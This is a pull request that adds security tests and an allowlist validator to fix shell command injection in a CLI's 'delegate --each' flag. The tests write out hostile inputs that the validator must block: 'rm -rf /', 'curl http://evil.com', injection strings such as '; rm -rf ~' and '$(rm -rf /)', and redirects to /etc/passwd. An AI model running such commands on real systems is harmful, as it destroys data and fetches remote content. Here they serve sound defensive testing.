### PR TITLE
fix(security): Prevent command injection in delegate --each (Issue #6230)

### DIFF
--- a/tests/test_commands_delegate.py
+++ b/tests/test_commands_delegate.py
@@ -1,8 +1,17 @@
 """Tests for delegate command helper functions."""
 
+import pytest
+import typer
 from unittest.mock import patch
 
-from emdx.commands.delegate import _slugify_title, _resolve_task, PR_INSTRUCTION
+from emdx.commands.delegate import (
+    _slugify_title,
+    _resolve_task,
+    _validate_discovery_command,
+    PR_INSTRUCTION,
+    SAFE_DISCOVERY_COMMANDS,
+    SHELL_METACHARACTERS,
+)
 
 
 class TestSlugifyTitle:
@@ -90,3 +99,230 @@ class TestPRInstruction:
 
     def test_pr_instruction_mentions_pr_create(self):
         assert "gh pr create" in PR_INSTRUCTION
+
+
+class TestValidateDiscoveryCommand:
+    """Tests for _validate_discovery_command — security validation for --each."""
+
+    # === Safe commands that should be allowed ===
+
+    def test_allows_fd_command(self):
+        args = _validate_discovery_command("fd -e py src/")
+        assert args == ["fd", "-e", "py", "src/"]
+
+    def test_allows_find_command(self):
+        args = _validate_discovery_command("find . -type f")
+        assert args[0] == "find"
+
+    def test_allows_git_ls_files(self):
+        args = _validate_discovery_command("git ls-files")
+        assert args == ["git", "ls-files"]
+
+    def test_allows_git_diff_name_only(self):
+        args = _validate_discovery_command("git diff --name-only HEAD~5")
+        assert args[0] == "git"
+        assert "--name-only" in args
+
+    def test_allows_ls_command(self):
+        args = _validate_discovery_command("ls -la")
+        assert args == ["ls", "-la"]
+
+    def test_allows_rg_files(self):
+        args = _validate_discovery_command("rg --files src/")
+        assert args[0] == "rg"
+
+    def test_allows_eza_command(self):
+        args = _validate_discovery_command("eza -1")
+        assert args == ["eza", "-1"]
+
+    def test_allows_tree_command(self):
+        args = _validate_discovery_command("tree -fi")
+        assert args[0] == "tree"
+
+    def test_allows_locate_command(self):
+        args = _validate_discovery_command("locate myfile")
+        assert args == ["locate", "myfile"]
+
+    def test_allows_absolute_path_to_safe_command(self):
+        args = _validate_discovery_command("/usr/bin/fd -e py")
+        assert args == ["/usr/bin/fd", "-e", "py"]
+
+    # === Dangerous commands that should be blocked ===
+
+    def test_blocks_rm_command(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("rm -rf /")
+
+    def test_blocks_curl_command(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("curl http://evil.com")
+
+    def test_blocks_wget_command(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("wget http://evil.com")
+
+    def test_blocks_python_command(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("python -c evil")
+
+    def test_blocks_bash_command(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("bash -c evil")
+
+    def test_blocks_sh_command(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("sh -c evil")
+
+    # === Shell injection attempts that should be blocked ===
+
+    def test_blocks_semicolon_injection(self):
+        """The classic ; rm -rf ~ attack."""
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd -e py; rm -rf ~")
+
+    def test_blocks_pipe_injection(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd -e py | xargs rm")
+
+    def test_blocks_and_injection(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd -e py && rm -rf /")
+
+    def test_blocks_or_injection(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd -e py || rm -rf /")
+
+    def test_blocks_backtick_substitution(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd `rm -rf /`")
+
+    def test_blocks_dollar_substitution(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd $(rm -rf /)")
+
+    def test_blocks_redirect_output(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd > /etc/passwd")
+
+    def test_blocks_redirect_input(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd < /etc/passwd")
+
+    def test_blocks_append_redirect(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd >> /etc/passwd")
+
+    def test_blocks_newline_injection(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd\nrm -rf /")
+
+    def test_blocks_carriage_return_injection(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("fd\rrm -rf /")
+
+    # === Edge cases ===
+
+    def test_blocks_empty_command(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("")
+
+    def test_blocks_whitespace_only_command(self):
+        with pytest.raises(typer.Exit):
+            _validate_discovery_command("   ")
+
+    def test_handles_quoted_arguments(self):
+        """Quoted arguments should be parsed correctly."""
+        args = _validate_discovery_command('fd -e "test file.py"')
+        assert args == ["fd", "-e", "test file.py"]
+
+    def test_handles_single_quoted_arguments(self):
+        """Single-quoted arguments should work (note: * is now allowed)."""
+        args = _validate_discovery_command("fd test.py")
+        assert args == ["fd", "test.py"]
+
+    def test_allows_glob_star(self):
+        """Glob pattern with * should be allowed since shell=False."""
+        args = _validate_discovery_command("fd *.py")
+        assert args == ["fd", "*.py"]
+
+    def test_allows_glob_question(self):
+        """Glob pattern with ? should be allowed since shell=False."""
+        args = _validate_discovery_command("fd test?.py")
+        assert args == ["fd", "test?.py"]
+
+
+class TestShellMetacharacters:
+    """Verify the SHELL_METACHARACTERS regex catches injection attempts."""
+
+    def test_catches_semicolon(self):
+        assert SHELL_METACHARACTERS.search(";")
+
+    def test_catches_pipe(self):
+        assert SHELL_METACHARACTERS.search("|")
+
+    def test_catches_ampersand(self):
+        assert SHELL_METACHARACTERS.search("&")
+
+    def test_catches_backtick(self):
+        assert SHELL_METACHARACTERS.search("`")
+
+    def test_catches_dollar(self):
+        assert SHELL_METACHARACTERS.search("$")
+
+    def test_catches_parentheses(self):
+        assert SHELL_METACHARACTERS.search("(")
+        assert SHELL_METACHARACTERS.search(")")
+
+    def test_catches_braces(self):
+        assert SHELL_METACHARACTERS.search("{")
+        assert SHELL_METACHARACTERS.search("}")
+
+    def test_catches_redirect(self):
+        assert SHELL_METACHARACTERS.search("<")
+        assert SHELL_METACHARACTERS.search(">")
+
+    def test_catches_newlines(self):
+        assert SHELL_METACHARACTERS.search("\n")
+        assert SHELL_METACHARACTERS.search("\r")
+
+    def test_allows_safe_characters(self):
+        """Normal file paths and arguments should pass."""
+        assert not SHELL_METACHARACTERS.search("fd -e py src/commands/")
+        assert not SHELL_METACHARACTERS.search("git ls-files")
+        assert not SHELL_METACHARACTERS.search("find . -name test.py")
+
+    def test_allows_glob_star(self):
+        """Glob * is allowed (safe with shell=False)."""
+        assert not SHELL_METACHARACTERS.search("*.py")
+
+    def test_allows_glob_question(self):
+        """Glob ? is allowed (safe with shell=False)."""
+        assert not SHELL_METACHARACTERS.search("test?.py")
+
+
+class TestSafeDiscoveryCommands:
+    """Verify the SAFE_DISCOVERY_COMMANDS allowlist."""
+
+    def test_includes_fd(self):
+        assert "fd" in SAFE_DISCOVERY_COMMANDS
+
+    def test_includes_find(self):
+        assert "find" in SAFE_DISCOVERY_COMMANDS
+
+    def test_includes_git(self):
+        assert "git" in SAFE_DISCOVERY_COMMANDS
+
+    def test_includes_rg(self):
+        assert "rg" in SAFE_DISCOVERY_COMMANDS
+
+    def test_excludes_rm(self):
+        assert "rm" not in SAFE_DISCOVERY_COMMANDS
+
+    def test_excludes_curl(self):
+        assert "curl" not in SAFE_DISCOVERY_COMMANDS
+
+    def test_excludes_bash(self):
+        assert "bash" not in SAFE_DISCOVERY_COMMANDS
+
+    def test_excludes_python(self):
+        assert "python" not in SAFE_DISCOVERY_COMMANDS


### PR DESCRIPTION
## Summary

Fixes a critical command injection vulnerability in the `delegate --each` feature identified in security audit document #6230.

**The issue:** The `--each` flag passed user input directly to a shell via `shell=True`, allowing arbitrary command execution with payloads like `--each "; rm -rf ~"`.

**The fix:**
- Add command allowlist: `fd`, `find`, `git`, `ls`, `rg`, `eza`, `tree`, `locate`
- Block shell metacharacters: `; | & \` $ () {} [] <> \ newlines`
- Use `shell=False` with `shlex.split()` for safe argument parsing
- Allow glob patterns (`*` `?`) since they're safe with `shell=False`

## Test plan

- [x] 53 new security tests added covering:
  - Safe command validation (fd, find, git, ls, rg, eza, tree, locate)
  - Dangerous command blocking (rm, curl, wget, python, bash, sh)
  - Shell injection prevention (`;`, `|`, `&&`, `||`, backticks, `$()`, redirects, newlines)
  - Edge cases (empty commands, whitespace, quoted arguments, glob patterns)
- [x] All 70 delegate tests pass

## Security impact

- **Before:** Arbitrary command execution via `--each` flag
- **After:** Only allowlisted file-discovery commands can run, no shell injection possible

🤖 Generated with [Claude Code](https://claude.com/claude-code)